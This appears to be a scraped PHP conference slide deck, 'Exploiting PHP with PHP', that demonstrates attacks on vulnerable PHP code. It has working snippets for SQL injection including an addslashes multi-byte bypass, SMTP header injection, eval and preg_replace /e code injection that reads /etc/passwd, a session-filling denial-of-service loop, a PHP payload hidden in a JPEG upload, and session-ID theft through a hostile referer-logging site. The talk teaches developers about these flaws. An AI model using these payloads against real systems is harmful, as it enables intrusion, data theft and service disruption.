Exploiting Php With Php

Exploiting PHP with PHP Arpad Ray @ PHPNW08

Why use PHP for this? We already know how to write PHP

Why use PHP for this? We already know how to write PHP Can use directly in test scripts

Why use PHP for this? We already know how to write PHP Can use directly in test scripts PHP provides everything we need

Why use PHP for this? We already know how to write PHP Can use directly in test scripts PHP provides everything we need Writing PHP can be very quick

Why use PHP for this? We already know how to write PHP Can use directly in test scripts PHP provides everything we need Writing PHP can be very quick Can efficiently re-use and combine attacks

SQL injection Probably the first attack most PHP developers hear of

SQL injection $q = "SELECT * FROM foobar WHERE id = $_GET[id]";

SQL injection $q = "SELECT * FROM foobar WHERE id = $_GET[id]"; index.php?id=1 OR 1=1 $_GET['id'] = '1 OR 1=1';

SQL injection $q = "SELECT * FROM foobar WHERE id = $_GET[id]"; index.php?id=1 OR 1=1 $_GET['id'] = '1 OR 1=1'; $q = "SELECT * FROM foobar WHERE id = 1 OR 1=1 ";

SQL injection $q = "SELECT * FROM foobar WHERE id = ' $_GET[id] ' ";

SQL injection $q = "SELECT * FROM foobar WHERE id = ' $_GET[id] ' "; index.php?id=' OR ''=' $_GET['id'] = “' OR ''='”;

SQL injection $q = "SELECT * FROM foobar WHERE id = ' $_GET[id] ' "; index.php?id=' OR ''=' $_GET['id'] = “' OR ''='”; $q = "SELECT * FROM foobar WHERE id = ' ' OR ''=' ' ";

SQL injection $q = "SELECT * FROM foobar WHERE id = ' $_POST[id] ' ";

SQL injection $q = "SELECT * FROM foobar WHERE id = $_POST[id]"; <form method=”post” action=” http://example.com/foo.php ”> <input type=”hidden” name=”id” value=”1 OR 1=1” /> <input type=”submit” /> </form>

SQL injection $q = "SELECT * FROM foobar WHERE id = $_POST[id]"; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => 'id=1 OR 1=1' ))); file_get_contents(' http://example.com/foo.php ', false, $context);

SQL injection $q = 'SELECT * FROM foobar WHERE id = ' . addslashes($id);

addslashes()‏ $id = addslashes($_POST['id']); $q = "SELECT * FROM foobar WHERE id = ' $id ' "; $_POST['id'] = “' OR ''='”; $q = "SELECT * FROM foobar WHERE id = '\' OR \'\'=\'' ";

addslashes()‏ Getting around that pesky backslash

addslashes()‏ Getting around that pesky backslash Multi-byte character attacks

addslashes()‏ Getting around that pesky backslash Multi-byte character attacks Swallow the backslash with a multi-byte character ending with that byte

addslashes()‏ Getting around that pesky backslash Multi-byte character attacks Swallow the backslash with a multi-byte character ending with that byte <start of mb character><single quote> // apply addslashes() <mb character><single quote>

addslashes()‏ $mbCharacter = "\xBF\x5C"; $quote = substr($mbCharacter, 0, -1) . '\'';

addslashes()‏ $mbCharacter = "\xBF\x5C"; $quote = substr($mbCharacter, 0, -1) . '\''; $id = " $quote OR $quote$quote = $quote "; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)) ))); file_get_contents('http://example.com/foo.php', false, $context); $q = "SELECT * FROM foobar WHERE id = ' ?' OR '?'='? ' ";

addslashes()‏ $mbCharacter = "\xBF\x5C"; $quote = substr($mbCharacter, 0, -1) . '\''; $id = " $quote OR 1=1 /* "; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)) ))); file_get_contents('http://example.com/foo.php', false, $context); $q = "SELECT * FROM foobar WHERE id = ' ?' OR 1=1 /* ' ";

magic_quotes_gpc Uses addslashes() so escaping is not secure

magic_quotes_gpc Uses addslashes() so escaping is not secure Fosters complacency

magic_quotes_gpc Uses addslashes() so escaping is not secure Fosters complacency Applications using magic quotes are much harder to make truly portable

magic_quotes_gpc Uses addslashes() so escaping is not secure Fosters complacency Applications using magic quotes are much harder to make truly portable Inconsistencies between PHP versions

magic_quotes_gpc $context = stream_context_create(array('http' => array( 'user_agent' => $foo ))); $context = stream_context_create(array('http' => array( 'method' => 'get' 'header' => 'X-Foo: ' . $foo )));

magic_quotes_gpc ? scalar'1=foo& array'1[scalar'2]=foo& array'1[array'2][scalar'3]=foo

magic_quotes_gpc Expected result: Array ( [scalar\'1] => foo [array\'1] => Array ( [scalar\'2] => foo [array\'2] => Array ( [scalar\'3] => foo ) ) )‏

magic_quotes_gpc PHP 4.3.3 Array ( [ scalar'1 ] => foo [ array'1 ] => Array ( [ scalar'2 ] => foo [array\'2] => Array ( [ scalar'3 ] => foo ) ) )‏

magic_quotes_gpc PHP 4.4.0 Array ( [ scalar'1 ] => foo [ array'1 ] => Array ( [ scalar\'2 ] => foo [array\'2] => Array ( [ scalar\'3 ] => foo ) ) )‏

magic_quotes_gpc PHP 5.0.0 (OFF)‏ Array ( [scalar\'1] => foo [array\'1] => Array ( [scalar\'2] => foo [array\'2] => Array ( [scalar\'3] => foo ) ) )‏

magic_quotes_gpc PHP 5.2.2 Array ( [scalar\'1] => foo [array\'1] => Array ( [scalar\'2] => foo [array\'2] => Array ( [scalar\'3] => foo ) ) )‏

magic_quotes_gpc There are also problems disabling magic_quotes_gpc

magic_quotes_gpc There are also problems disabling magic_quotes_gpc function stripslashes_deep($value) { $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); return $value; }

magic_quotes_gpc There are also problems disabling magic_quotes_gpc Instead of passing id=1 we can pass: 'id' . str_repeat('[]', 1000) . '=1' We can trivially force the web server to do a lot of unnecessary work

Denial of Service Failure to release resources

Denial of Service Failure to release resources Writing user data to disk

Denial of Service function fill_sessions($url, $num = 1000) { $context = stream_context_create(array( 'http' => array( 'method' => 'HEAD' ) )); for ($i = $num; $i--;) { file_get_contents($url, false, $context); } }

Denial of Service Failure to release resources Writing user data to disk Locking customer accounts

SMTP injection $to = 'foobar@example.com'; $subject = $_POST['subject']; $from = $_POST['from']; mail($to, $subject, 'From: ' . $from);

SMTP injection $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array( 'subject' => "foo\r\nCc: target@example.com", 'from' => "from@example.com\r\nCc: target@example.com" ))‏ )));

SMTP injection Variable mail address

SMTP injection Variable mail address Sanitisation

SMTP injection Variable mail address Sanitisation Validation

SMTP injection Variable mail address Sanitisation Validation /^[^@]+@(?:\w+\.)+\w{2,6}$/

Hot vulnerabilities Direct eval() injection

Hot vulnerabilities Direct eval() injection class Foo { function Foo() { $a = func_get_args(); print_r($a); } } eval('$foo = new Foo(' . implode(',', $args) . ');');

Hot vulnerabilities Direct eval() injection $args[0] = 'readfile(“/etc/passed”)';

Hot vulnerabilities preg_replace() using /e modifier $s = '$-42 dollars'; preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s)‏ $s = '42';

Hot vulnerabilities preg_replace() using /e modifier $s = '$1).foobar().abs(1 dollars'; preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s)‏ $s = '4242';

Hot vulnerabilities preg_replace() using /e modifier $s = '$1).readfile(chr(47).chr(101)...abs(1 dollars'; preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s)‏ $s = '4242';

Hot vulnerabilities Variable in include() call $page = $_GET['page']; include $page;

Hot vulnerabilities Direct eval() injection preg_replace() using /e modifier Variable in include() call Uploading PHP files

Hot vulnerabilities Uploading PHP files Check file extension Check uploaded MIME type Check file MIME type Move outside of web root

Hot vulnerabilities $script = <<<EOT <?php var_dump('hello world!'); EOT; $jpeg = '/path/to/some_valid.jpg'; $fp = fopen($jpeg, 'ab'); fwrite($fp, $script); fclose($fp);

Hot vulnerabilities Direct eval() injection preg_replace() using /e modifier Variable in include() call Uploading PHP files Shell injection

Making an evil website HTTP requests can give us lots of interesting information PHPSESSID = bingo

Making an evil website if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+) /xi', $_SESSION['HTTP_REFERER'])); }

Making an evil website if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+) | (?<==)([a-f\d]{32}|[a-f\d]{40})\b /xi', $_SESSION['HTTP_REFERER'])); }

Making use of victims File scan

Making use of victims File scan $dir = new RecursiveIteratorIterator( new RecursiveDirectoryIterator('/', true)‏ ); foreach ($dir as $file) { echo $file->getPathname(), "\n"; }

Making use of victims File scan Subverting existing files

Making use of victims File scan Subverting existing files Escalate privileges, take over machine

Making use of victims File scan Subverting existing files Escalate privileges, take over machine botnet.php

Exploiting Php With Php

More Related Content

What's hot (20)

Viewers also liked (6)

Similar to Exploiting Php With Php (20)

More from Jeremy Coates (17)

Recently uploaded (20)

Exploiting Php With Php